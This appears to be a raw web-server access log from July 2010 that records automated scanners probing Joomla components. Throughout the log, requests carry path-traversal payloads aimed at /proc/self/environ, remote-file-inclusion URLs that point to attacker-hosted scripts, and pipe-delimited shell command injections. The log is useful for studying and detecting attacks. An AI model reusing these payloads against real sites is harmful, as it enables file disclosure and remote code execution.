87.233.155.149 - - [26/Jul/2010:13:10:11 +0200] "GET //?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.79"
222.124.193.12 - - [26/Jul/2010:13:12:12 +0200] "GET /logs/access_log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:13:12:12 +0200] "GET /logs/access_log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:13:12:12 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:13:12:12 +0200] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:13:12:13 +0200] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:13:12:13 +0200] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:16:41 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:16:42 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:16:42 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:13:17:47 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:28:43 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
74.55.73.74 - - [26/Jul/2010:13:37:33 +0200] "GET /index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:13:40:18 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:40:18 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:40:18 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:40:18 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:40:19 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:40:19 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
74.55.73.74 - - [26/Jul/2010:13:42:58 +0200] "GET /logs/access_log/index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:13:42:58 +0200] "GET /index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:13:42:59 +0200] "GET /logs/index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:13:45:07 +0200] "GET /logs/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:07 +0200] "GET /logs/access_log%20%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:07 +0200] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:08 +0200] "GET /index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:08 +0200] "GET /logs/access_log%20%20/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:45:08 +0200] "GET /logs/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
222.236.47.182 - - [26/Jul/2010:13:54:51 +0200] "GET //admin/business_inc/saveserver.php?thisdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
222.236.47.182 - - [26/Jul/2010:13:54:53 +0200] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
222.236.47.182 - - [26/Jul/2010:13:54:53 +0200] "GET /logs/error_log//admin/business_inc/saveserver.php?thisdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
67.195.112.43 - - [26/Jul/2010:14:11:11 +0200] "GET /?C=M;O=D HTTP/1.0" 200 560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.165.213.8 - - [26/Jul/2010:14:34:32 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:34:33 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
80.89.233.48 - - [26/Jul/2010:14:38:06 +0200] "GET //index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:53 +0200] "GET /logs/access_log//index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:54 +0200] "GET //index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:54 +0200] "GET /logs//index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
188.165.213.8 - - [26/Jul/2010:14:40:00 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
64.34.172.171 - - [26/Jul/2010:14:42:12 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:14:42:30 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.165.213.8 - - [26/Jul/2010:14:42:41 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:42:41 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:42:41 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:14:45:22 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:14:45:22 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:55:31 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:55:31 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:55:31 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
83.149.110.213 - - [26/Jul/2010:15:00:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:26 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:27 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:27 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:27 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:39 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:40 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:00:43 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:44 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:48 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:48 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:15:03:02 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:03:02 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:04:05 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:04:06 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
188.127.248.175 - - [26/Jul/2010:15:07:50 +0200] "GET /logs/access_log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:07:50 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:07:51 +0200] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
64.34.172.171 - - [26/Jul/2010:15:11:04 +0200] "GET /logs/access_log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:11:04 +0200] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:11:04 +0200] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
92.43.201.28 - - [26/Jul/2010:15:11:16 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:11:16 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:12:22 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:12:22 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
76.242.100.234 - - [26/Jul/2010:15:19:06 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:19:06 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
83.138.166.126 - - [26/Jul/2010:15:26:15 +0200] "GET /logs/access_log%20%20//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:26:15 +0200] "GET /logs//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:26:15 +0200] "GET //index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:26:16 +0200] "GET /logs/access_log%20%20//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:26:16 +0200] "GET /logs//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:26:21 +0200] "GET //index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:23 +0200] "GET //index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:23 +0200] "GET /logs//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:23 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:24 +0200] "GET //index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:24 +0200] "GET /logs//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
83.138.166.126 - - [26/Jul/2010:15:28:24 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:55 +0200] "GET //index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:56 +0200] "GET /logs//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:56 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:56 +0200] "GET //index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:56 +0200] "GET /logs//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:33:56 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
91.121.7.123 - - [26/Jul/2010:15:40:47 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:15:40:47 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:15:40:52 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:40:52 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:40:55 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:40:55 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
188.165.213.8 - - [26/Jul/2010:15:41:19 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
64.34.172.171 - - [26/Jul/2010:15:41:23 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
188.165.213.8 - - [26/Jul/2010:15:42:05 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
